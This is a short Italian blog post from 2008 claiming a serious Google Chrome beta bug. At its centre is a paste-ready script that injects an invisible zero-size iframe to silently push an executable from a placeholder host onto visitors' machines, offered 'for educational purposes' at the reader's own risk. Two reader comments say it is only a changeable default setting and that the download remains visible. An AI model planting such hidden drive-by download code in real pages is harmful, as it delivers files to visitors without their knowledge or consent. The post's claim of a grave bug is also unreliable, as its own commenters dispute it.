Grave bug di Google Chrome

Il famoso Web browser sviluppato da Google, permette ad un ipotetico “hacker” di scaricare automaticamente qualsiasi tipo di file (eseguibili compresi) sul computer della persona che visita la sua pagina web progettata ad hoc.

Basta inserire nella pagina web il seguente codice:

<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>

dove http://www.example.com è il dominio del sito sviluppato dall’ hacker.

Lo script è stato testato su Windows Vista SP1 e Windows XP SP3 con Google Chrome (BETA).

ATTENZIONE!

Il codice è stato creato solo per fini educativi.
Usate il codice a vostro rischio e pericolo.
L’autore non è responsabile dei danni causati dal suo impiego.

CONDIVIDI
ARTICOLI CORRELATI
2 commenti a “Grave bug di Google Chrome”

mah, forse definirlo bug è un po’ eccessivo…

è una scelta di google che per default non chiede conferma per iniziare il download di un file, se cambiamo l’impostazione ci verrà chiesto conferma proprio come gli altri browser

inoltre il download è visualizzabile nella barra in basso proprio come gli altri e l’animazione al termine con la frecciona blu non lo fa certamente passare inosservato!

Inviato da carlo il 5 settembre 2008 alle 14:16

Cominciamo bene… dopo la bufala Safari di qualche mese fà (il più veloce browser del mondo… nel senso che andava in crash in 30 secondi) ora anche questa di Google Chrome. Avanti così, verso altre inimitabili (dis)avventure…

Inviato da ricky il 5 settembre 2008 alle 14:45
Lascia un commento

Captcha - risolvi l\'operazione per inviare il commento * Time limit is exhausted. Please reload CAPTCHA.